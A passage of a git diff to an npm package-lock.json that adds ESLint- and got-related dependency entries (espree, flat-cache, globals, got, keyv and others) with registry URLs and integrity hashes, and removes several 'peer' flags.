"1.1.4", + "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", + "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", + "dev": true + }, + "node_modules/eslint/node_modules/escape-string-regexp": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-4.0.0.tgz", + "integrity": "sha512-TtpcNJ3XAzx3Gq8sWRzJaVajRs0uVxA2YAkdb1jm2YkPz4G6egUFAyA3n5vtEIZefPk5Wa4UXbKuS5fKkJWdgA==", + "dev": true, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/eslint/node_modules/find-up": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/find-up/-/find-up-5.0.0.tgz", + "integrity": "sha512-78/PXT1wlLLDgTzDs7sjq9hzz0vXD+zn+7wypEe4fXQxCmdmqfGsEPQxmiCSQI3ajFV91bVSsvNtrJRiW6nGng==", + "dev": true, + "dependencies": { + "locate-path": "^6.0.0", + "path-exists": "^4.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/eslint/node_modules/glob-parent": { + "version": "6.0.2", + "resolved": "https://registry.npmjs.org/glob-parent/-/glob-parent-6.0.2.tgz", + "integrity": "sha512-XxwI8EOhVQgWp6iDL+3b0r86f4d6AX6zSU55HfB4ydCEuXLXc5FcYeOu+nnGftS4TEju/11rt4KJPTMgbfmv4A==", + "dev": true, + "dependencies": { + "is-glob": "^4.0.3" + }, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/eslint/node_modules/has-flag": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", + "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/eslint/node_modules/json-schema-traverse": { + "version": "0.4.1", + "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", + "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==", + "dev": true + }, + "node_modules/eslint/node_modules/levn": { + "version": "0.4.1", + "resolved": "https://registry.npmjs.org/levn/-/levn-0.4.1.tgz", + "integrity": "sha512-+bT2uH4E5LGE7h/n3evcS/sQlJXCpIp6ym8OWJ5eV6+67Dsql/LaaT7qJBAt2rzfoa/5QBGBhxDix1dMt2kQKQ==", + "dev": true, + "dependencies": { + "prelude-ls": "^1.2.1", + "type-check": "~0.4.0" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/eslint/node_modules/locate-path": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-6.0.0.tgz", + "integrity": "sha512-iPZK6eYjbxRu3uB4/WZ3EsEIMJFMqAoopl3R+zuq0UjcAm/MO6KCweDgPfP3elTztoKP3KtnVHxTn2NHBSDVUw==", + "dev": true, + "dependencies": { + "p-locate": "^5.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/eslint/node_modules/optionator": { + "version": "0.9.4", + "resolved": "https://registry.npmjs.org/optionator/-/optionator-0.9.4.tgz", + "integrity": "sha512-6IpQ7mKUxRcZNLIObR0hz7lxsapSSIYNZJwXPGeF0mTVqGKFIXj1DQcMoT22S3ROcLyY/rz0PWaWZ9ayWmad9g==", + "dev": true, + "dependencies": { + "deep-is": "^0.1.3", + "fast-levenshtein": "^2.0.6", + "levn": "^0.4.1", + "prelude-ls": "^1.2.1", + "type-check": "^0.4.0", + "word-wrap": "^1.2.5" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/eslint/node_modules/p-limit": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", + "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", + "dev": true, + "dependencies": { + "yocto-queue": "^0.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/eslint/node_modules/p-locate": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-5.0.0.tgz", + "integrity": "sha512-LaNjtRWUBY++zB5nE/NwcaoMylSPk+S+ZHNB1TzdbMJMny6dynpAGt7X/tl/QYq3TIeE6nxHppbo2LGymrG5Pw==", + "dev": true, + "dependencies": { + "p-limit": "^3.0.2" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/eslint/node_modules/path-exists": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", + "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/eslint/node_modules/prelude-ls": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/prelude-ls/-/prelude-ls-1.2.1.tgz", + "integrity": "sha512-vkcDPrRZo1QZLbn5RLGPpg/WmIQ65qoWWhcGKf/b5eplkkarX0m9z8ppCat4mlOqUsWpyNuYgO3VRyrYHSzX5g==", + "dev": true, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/eslint/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/eslint/node_modules/type-check": { + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/type-check/-/type-check-0.4.0.tgz", + "integrity": "sha512-XleUoc9uwGXqjWwXaUTZAmzMcFZ5858QA2vvx1Ur5xIcixXIP+8LnFDgRplU30us6teqdlskFfu+ae4K79Ooew==", + "dev": true, + "dependencies": { + "prelude-ls": "^1.2.1" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/espree": { + "version": "10.3.0", + "resolved": "https://registry.npmjs.org/espree/-/espree-10.3.0.tgz", + "integrity": "sha512-0QYC8b24HWY8zjRnDTL6RiHfDbAWn63qb4LMj1Z4b076A4une81+z03Kg7l7mn/48PUTqoLptSXez8oknU8Clg==", + "dev": true, + "dependencies": { + "acorn": "^8.14.0", + "acorn-jsx": "^5.3.2", + "eslint-visitor-keys": "^4.2.0" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" + } + }, + "node_modules/esprima": { + "version": "2.7.3", + "resolved": "https://registry.npmjs.org/esprima/-/esprima-2.7.3.tgz", + "integrity": "sha512-OarPfz0lFCiW4/AV2Oy1Rp9qu0iusTKqykwTspGCZtPxmF81JR4MmIebvF1F9+UOKth2ZubLQ4XGGaU+hSn99A==", + "peer": true, + "bin": { + "esparse": "bin/esparse.js", + "esvalidate": "bin/esvalidate.js" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/esquery": { + "version": "1.6.0", + "resolved": "https://registry.npmjs.org/esquery/-/esquery-1.6.0.tgz", + "integrity": "sha512-ca9pw9fomFcKPvFLXhBKUK90ZvGibiGOvRJNbjljY7s7uq/5YO4BOzcYtJqExdx99rF6aAcnRxHmcUHcz6sQsg==", + "dev": true, + "dependencies": { + "estraverse": "^5.1.0" + }, + "engines": { + "node": ">=0.10" + } + }, + "node_modules/esquery/node_modules/estraverse": { + "version": "5.3.0", + "resolved": "https://registry.npmjs.org/estraverse/-/estraverse-5.3.0.tgz", + "integrity": "sha512-MMdARuVEQziNTeJD8DgMqmhwR11BRQ/cBP+pLtYdSTnf3MIO8fFeiINEbX36ZdNlfU/7A9f3gUw49B3oQsvwBA==", + "dev": true, + "engines": { + "node": ">=4.0" + } + }, + "node_modules/esrecurse": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/esrecurse/-/esrecurse-4.3.0.tgz", + "integrity": "sha512-KmfKL3b6G+RXvP8N1vr3Tq1kL/oCFgn2NYXEtqP8/L3pKapUA4G8cFVaoF3SU323CD4XypR/ffioHmkti6/Tag==", + "dev": true, + "dependencies": { + "estraverse": "^5.2.0" + }, + "engines": { + "node": ">=4.0" + } + }, + "node_modules/esrecurse/node_modules/estraverse": { + "version": "5.3.0", + "resolved": "https://registry.npmjs.org/estraverse/-/estraverse-5.3.0.tgz", + "integrity": "sha512-MMdARuVEQziNTeJD8DgMqmhwR11BRQ/cBP+pLtYdSTnf3MIO8fFeiINEbX36ZdNlfU/7A9f3gUw49B3oQsvwBA==", + "dev": true, + "engines": { + "node": ">=4.0" + } + }, + "node_modules/estraverse": { + "version": "1.9.3", + "resolved": "https://registry.npmjs.org/estraverse/-/estraverse-1.9.3.tgz", + "integrity": "sha512-25w1fMXQrGdoquWnScXZGckOv+Wes+JDnuN/+7ex3SauFRS72r2lFDec0EKPt2YD1wUJ/IrfEex+9yp4hfSOJA==", + "peer": true, "engines": { "node": ">=0.10.0" } @@ -3170,7 +4050,6 @@ "version": "2.0.3", "resolved": "https://registry.npmjs.org/esutils/-/esutils-2.0.3.tgz", "integrity": "sha512-kVscqXk4OCp68SZ0dkgEKVi6/8ij300KBWTJq32P/dYeWTSwK41WyTxalN1eRmA5Z9UU/LX9D7FWSmV9SAYx6g==", - "peer": true, "engines": { "node": ">=0.10.0" } @@ -3465,8 +4344,12 @@ "node_modules/fast-deep-equal": { "version": "3.1.3", "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", - "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==", - "peer": true + "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" + }, + "node_modules/fast-diff": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/fast-diff/-/fast-diff-1.3.0.tgz", + "integrity": "sha512-VxPP4NqbUjj6MaAOafWeUn2cXWLcCtljklUtZf0Ind4XQ+QPtmA0b18zZy0jIQx+ExRVCR/ZQpBmik5lXshNsw==" }, "node_modules/fast-glob": { "version": "3.3.2", @@ -3484,11 +4367,15 @@ "node": ">=8.6.0" } }, + "node_modules/fast-json-stable-stringify": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", + "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" + }, "node_modules/fast-levenshtein": { "version": "2.0.6", "resolved": "https://registry.npmjs.org/fast-levenshtein/-/fast-levenshtein-2.0.6.tgz", - "integrity": "sha512-DCXu6Ifhqcks7TZKY3Hxp3y6qphY5SJZmrWMDrKcERSOXWQdMhU9Ig/PYrzyw/ul9jOIyh0N4M0tbC5hodg8dw==", - "peer": true + "integrity": "sha512-DCXu6Ifhqcks7TZKY3Hxp3y6qphY5SJZmrWMDrKcERSOXWQdMhU9Ig/PYrzyw/ul9jOIyh0N4M0tbC5hodg8dw==" }, "node_modules/fastq": { "version": "1.17.1", @@ -3499,6 +4386,18 @@ "reusify": "^1.0.4" } }, + "node_modules/file-entry-cache": { + "version": "8.0.0", + "resolved": "https://registry.npmjs.org/file-entry-cache/-/file-entry-cache-8.0.0.tgz", + "integrity": "sha512-XXTUwCvisa5oacNGRP9SfNtYBNAMi+RPwBFmblZEF7N7swHYQS6/Zfk7SRwx4D5j3CH211YNRco1DEMNVfZCnQ==", + "dev": true, + "dependencies": { + "flat-cache": "^4.0.0" + }, + "engines": { + "node": ">=16.0.0" + } + }, "node_modules/fill-range": { "version": "7.1.1", "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", @@ -3541,6 +4440,25 @@ "flat": "cli.js" } }, + "node_modules/flat-cache": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/flat-cache/-/flat-cache-4.0.1.tgz", + "integrity": "sha512-f7ccFPK3SXFHpx15UIGyRJ/FJQctuKZ0zVuN3frBo4HnK3cay9VEW0R6yPYFHC0AgqhukPzKjq22t5DmAyqGyw==", + "dev": true, + "dependencies": { + "flatted": "^3.2.9", + "keyv": "^4.5.4" + }, + "engines": { + "node": ">=16" + } + }, + "node_modules/flatted": { + "version": "3.3.1", + "resolved": "https://registry.npmjs.org/flatted/-/flatted-3.3.1.tgz", + "integrity": "sha512-X8cqMLLie7KsNUDSdzeN8FYK9rEt4Dt67OsG/DNGnYTSDBG4uFAJFBnUeiV+zCVAvwFy56IjM9sH51jVaEhNxw==", + "dev": true + }, "node_modules/follow-redirects": { "version": "1.15.6", "resolved": "https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.15.6.tgz", @@ -3574,6 +4492,14 @@ "node": ">= 6" } }, + "node_modules/form-data-encoder": { + "version": "2.1.4", + "resolved": "https://registry.npmjs.org/form-data-encoder/-/form-data-encoder-2.1.4.tgz", + "integrity": "sha512-yDYSgNMraqvnxiEXO4hi88+YZxaHC6QKzb5N84iRCTDeRO7ZALpir/lVmf/uXUhnwUr2O4HU8s/n6x+yNjQkHw==", + "engines": { + "node": ">= 14.17" + } + }, "node_modules/fp-ts": { "version": "1.19.3", "resolved": "https://registry.npmjs.org/fp-ts/-/fp-ts-1.19.3.tgz", @@ -3670,6 +4596,17 @@ "node": ">=4" } }, + "node_modules/get-stream": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", + "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, "node_modules/ghost-testrpc": { "version": "0.0.2", "resolved": "https://registry.npmjs.org/ghost-testrpc/-/ghost-testrpc-0.0.2.tgz", @@ -3740,6 +4677,18 @@ "node": ">=6" } }, + "node_modules/globals": { + "version": "15.11.0", + "resolved": "https://registry.npmjs.org/globals/-/globals-15.11.0.tgz", + "integrity": "sha512-yeyNSjdbyVaWurlwCpcA6XNBrHTMIeDdj0/hnvX/OLJ9ekOXYbLsLinH/MucQyGvNnXhidTdNhTtJaffL2sMfw==", + "dev": true, + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, "node_modules/globby": { "version": "10.0.2", "resolved": "https://registry.npmjs.org/globby/-/globby-10.0.2.tgz", @@ -3771,6 +4720,30 @@ "url": "https://github.com/sponsors/ljharb" } }, + "node_modules/got": { + "version": "12.6.1", + "resolved": "https://registry.npmjs.org/got/-/got-12.6.1.tgz", + "integrity": "sha512-mThBblvlAF1d4O5oqyvN+ZxLAYwIJK7bpMxgYqPD9okW0C3qm5FFn7k811QrcuEBwaogR3ngOFoCfs6mRv7teQ==", + "dependencies": { + "@sindresorhus/is": "^5.2.0", + "@szmarczak/http-timer": "^5.0.1", + "cacheable-lookup": "^7.0.0", + "cacheable-request": "^10.2.8", + "decompress-response": "^6.0.0", + "form-data-encoder": "^2.1.2", + "get-stream": "^6.0.1", + "http2-wrapper": "^2.1.10", + "lowercase-keys": "^3.0.0", + "p-cancelable": "^3.0.0", + "responselike": "^3.0.0" + }, + "engines": { + "node": ">=14.16" + }, + "funding": { + "url": "https://github.com/sindresorhus/got?sponsor=1" + } + }, "node_modules/graceful-fs": { "version": "4.2.11", "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", @@ -3993,6 +4966,11 @@ "node": ">=6.0.0" } }, + "node_modules/http-cache-semantics": { + "version": "4.1.1", + "resolved": "https://registry.npmjs.org/http-cache-semantics/-/http-cache-semantics-4.1.1.tgz", + "integrity": "sha512-er295DKPVsV82j5kw1Gjt+ADA/XYHsajl82cGNQG2eyoPkvgUhX+nDIyelzhIWbbsXP39EHcI6l5tYs2FYqYXQ==" + }, "node_modules/http-errors": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/http-errors/-/http-errors-2.0.0.tgz", @@ -4023,6 +5001,18 @@ "integrity": "sha512-F0KIgDJfy2nA3zMLmWGKxcH2ZVEtCZXHHdOQs2gSaQ27+lNeEfGxzkIw90aXswATX7AZ33tahPbzy6KAfUreVw==", "peer": true }, + "node_modules/http2-wrapper": { + "version": "2.2.1", + "resolved": "https://registry.npmjs.org/http2-wrapper/-/http2-wrapper-2.2.1.tgz", + "integrity": "sha512-V5nVw1PAOgfI3Lmeaj2Exmeg7fenjhRUgz1lPSezy1CuhPYbgQtbQj4jZfEAEMlaL+vupsvhjqCyjzob0yxsmQ==", + "dependencies": { + "quick-lru": "^5.1.1", + "resolve-alpn": "^1.2.0" + }, + "engines": { + "node": ">=10.19.0" + } + }, "node_modules/https-proxy-agent": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-5.0.1.tgz", @@ -4050,7 +5040,6 @@ "version": "5.3.1", "resolved": "https://registry.npmjs.org/ignore/-/ignore-5.3.1.tgz", "integrity": "sha512-5Fytz/IraMjqpwfd34ke28PTVMjZjJG2MPn5t7OE4eUCUNf8BAa7b5WUS9/Qvr6mwOQS7Mk6vdsMno5he+T8Xw==", - "peer": true, "engines": { "node": ">= 4" } @@ -4070,6 +5059,38 @@ "resolved": "https://registry.npmjs.org/immutable/-/immutable-4.3.6.tgz", "integrity": "sha512-Ju0+lEMyzMVZarkTn/gqRpdqd5dOPaz1mCZ0SH3JV6iFw81PldE/PEB1hWVEA288HPt4WXW8O7AWxB10M+03QQ==" }, + "node_modules/import-fresh": { + "version": "3.3.0", + "resolved": "https://registry.npmjs.org/import-fresh/-/import-fresh-3.3.0.tgz", + "integrity": "sha512-veYYhQa+D1QBKznvhUHxb8faxlrwUnxseDAbAp457E0wLNio2bOSKnjYDhMj+YiAq61xrMGhQk9iXVk5FzgQMw==", + "dependencies": { + "parent-module": "^1.0.0", + "resolve-from": "^4.0.0" + }, + "engines": { + "node": ">=6" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/import-fresh/node_modules/resolve-from": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-4.0.0.tgz", + "integrity": "sha512-pb/MYmXstAkysRFx8piNI1tGFNQIFA3vkE3Gq4EuA1dF6gHp/+vgZqsCGJapvy8N3Q+4o7FwvquPJcnZ7RYy4g==", + "engines": { + "node": ">=4" + } + }, + "node_modules/imurmurhash": { + "version": "0.1.4", + "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", + "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", + "dev": true, + "engines": { + "node": ">=0.8.19" + } + }, "node_modules/indent-string": { "version": "4.0.0", "resolved": "https://registry.npmjs.org/indent-string/-/indent-string-4.0.0.tgz", @@ -4096,8 +5117,7 @@ "node_modules/ini": { "version": "1.3.8", "resolved": "https://registry.npmjs.org/ini/-/ini-1.3.8.tgz", - "integrity": "sha512-JV/yugV2uzW5iMRSiZAyDtQd+nxtUnjeLt0acNdw98kKLrvuRVyB80tsREOE7yvGVgalhZ6RNXCmEHkUKBKxew==", - "peer": true + "integrity": "sha512-JV/yugV2uzW5iMRSiZAyDtQd+nxtUnjeLt0acNdw98kKLrvuRVyB80tsREOE7yvGVgalhZ6RNXCmEHkUKBKxew==" }, "node_modules/interpret": { "version": "1.4.0", @@ -4116,6 +5136,11 @@ "fp-ts": "^1.0.0" } }, + "node_modules/is-arrayish": { + "version": "0.2.1", + "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", + "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==" + }, "node_modules/is-binary-path": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/is-binary-path/-/is-binary-path-2.1.0.tgz", @@ -4199,14 +5224,18 @@ "node_modules/isexe": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==", - "peer": true + "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==" }, "node_modules/js-sha3": { "version": "0.8.0", "resolved": "https://registry.npmjs.org/js-sha3/-/js-sha3-0.8.0.tgz", "integrity": "sha512-gF1cRrHhIzNfToc802P800N8PpXS+evLLXfsVpowqmAFR9uwbi89WvXg2QspOmXL8QL86J4T1EpFu+yUkwJY3Q==" }, + "node_modules/js-tokens": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", + "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==" + }, "node_modules/js-yaml": { "version": "4.1.0", "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.0.tgz", @@ -4218,11 +5247,26 @@ "js-yaml": "bin/js-yaml.js" } }, + "node_modules/json-buffer": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/json-buffer/-/json-buffer-3.0.1.tgz", + "integrity": "sha512-4bV5BfR2mqfQTJm+V5tPPdf+ZpuhiIvTuAB5g8kcrXOZpTT/QwwVRWBywX1ozr6lEuPdbHxwaJlm9G6mI2sfSQ==" + }, + "node_modules/json-parse-even-better-errors": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", + "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==" + }, "node_modules/json-schema-traverse": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", - "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==", - "peer": true + "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==" + }, + "node_modules/json-stable-stringify-without-jsonify": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/json-stable-stringify-without-jsonify/-/json-stable-stringify-without-jsonify-1.0.1.tgz", + "integrity": "sha512-Bdboy+l7tA3OGW6FjyFHWkP5LuByj1Tk33Ljyq0axyzdk9//JSi2u3fP1QSmd1KNwq6VOKYGlAu87CisVir6Pw==", + "dev": true }, "node_modules/json-stringify-safe": { "version": "5.0.1", @@ -4261,6 +5305,14 @@ "node": ">=10.0.0" } }, + "node_modules/keyv": { + "version": "4.5.4", + "resolved": "https://registry.npmjs.org/keyv/-/keyv-4.5.4.tgz", + "integrity": "sha512-oxVHkHR/EJf2CNXnWxRLW6mg7JyCCUcG0DtEGmL2ctUo1PNTin1PUil+r/+4r5MpVgC/fn1kjsx7mjSujKqIpw==", + "dependencies": { + "json-buffer": "3.0.1" + } + }, "node_modules/kind-of": { "version": "6.0.3", "resolved": "https://registry.npmjs.org/kind-of/-/kind-of-6.0.3.tgz", @@ -4287,6 +5339,20 @@ "node": ">=6" } }, + "node_modules/latest-version": { + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/latest-version/-/latest-version-7.0.0.tgz", + "integrity": "sha512-KvNT4XqAMzdcL6ka6Tl3i2lYeFDgXNCuIX+xNx6ZMVR1dFq+idXd9FLKNMOIx0t9mJ9/HudyX4oZWXZQ0UJHeg==", + "dependencies": { + "package-json": "^8.1.0" + }, + "engines": { + "node": ">=14.16" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, "node_modules/levn": { "version": "0.3.0", "resolved": "https://registry.npmjs.org/levn/-/levn-0.3.0.tgz", @@ -4300,6 +5366,11 @@ "node": ">= 0.8.0" } }, + "node_modules/lines-and-columns": { + "version": "1.2.4", + "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", + "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==" + }, "node_modules/locate-path": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-2.0.0.tgz", @@ -4335,11 +5406,16 @@ "integrity": "sha512-pDo3lu8Jhfjqls6GkMgpahsF9kCyayhgykjyLMNFTKWrpVdAQtYyB4muAMWozBB4ig/dtWAmsMxLEI8wuz+DYQ==", "peer": true }, + "node_modules/lodash.merge": { + "version": "4.6.2", + "resolved": "https://registry.npmjs.org/lodash.merge/-/lodash.merge-4.6.2.tgz", + "integrity": "sha512-0KpjqXRVvrYyCsX1swR/XTK0va6VQkQM6MNo7PqW77ByjAhoARA8EfrP1N4+KlKj8YS0ZUCtRT/YUuhyYDujIQ==", + "dev": true + }, "node_modules/lodash.truncate": { "version": "4.4.2", "resolved": "https://registry.npmjs.org/lodash.truncate/-/lodash.truncate-4.4.2.tgz", - "integrity": "sha512-jttmRe7bRse52OsWIMDLaXxWqRAmtIUccAQ3garviCqJjafXOfNMO0yMfNpdD6zbGaTU0P5Nz7e7gAT6cKmJRw==", - "peer": true + "integrity": "sha512-jttmRe7bRse52OsWIMDLaXxWqRAmtIUccAQ3garviCqJjafXOfNMO0yMfNpdD6zbGaTU0P5Nz7e7gAT6cKmJRw==" }, "node_modules/log-symbols": { "version": "4.1.0", @@ -4429,6 +5505,17 @@ "get-func-name": "^2.0.1" } }, + "node_modules/lowercase-keys": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/lowercase-keys/-/lowercase-keys-3.0.0.tgz", + "integrity": "sha512-ozCC6gdQ+glXOQsveKD0YsDy8DSQFjDTz4zyzEHNV5+JP5D62LmfDZ6o1cycFx9ouG940M5dE8C8CTewdj2YWQ==", + "engines": { + "node": "^12.20.0 || ^14.13.1 || >=16.0.0" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, "node_modules/lru_map": { "version": "0.3.3", "resolved": "https://registry.npmjs.org/lru_map/-/lru_map-0.3.3.tgz", @@ -4513,6 +5600,17 @@ "node": ">= 0.6" } }, + "node_modules/mimic-response": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/mimic-response/-/mimic-response-4.0.0.tgz", + "integrity": "sha512-e5ISH9xMYU0DzrT+jl8q2ze9D6eWBto+I8CNpe+VI+K2J/F/k3PdkdTdz4wvGVH4NTpo+NRYTVIuMQEMMcsLqg==", + "engines": { + "node": "^12.20.0 || ^14.13.1 || >=16.0.0" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, "node_modules/minimalistic-assert": { "version": "1.0.1", "resolved": "https://registry.npmjs.org/minimalistic-assert/-/minimalistic-assert-1.0.1.tgz", @@ -4538,7 +5636,6 @@ "version": "1.2.8", "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==", - "peer": true, "funding": { "url": "https://github.com/sponsors/ljharb" } @@ -4798,6 +5895,12 @@ "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==" }, + "node_modules/natural-compare": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", + "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", + "dev": true + }, "node_modules/ndjson": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/ndjson/-/ndjson-2.0.0.tgz", @@ -4876,6 +5979,17 @@ "node": ">=0.10.0" } 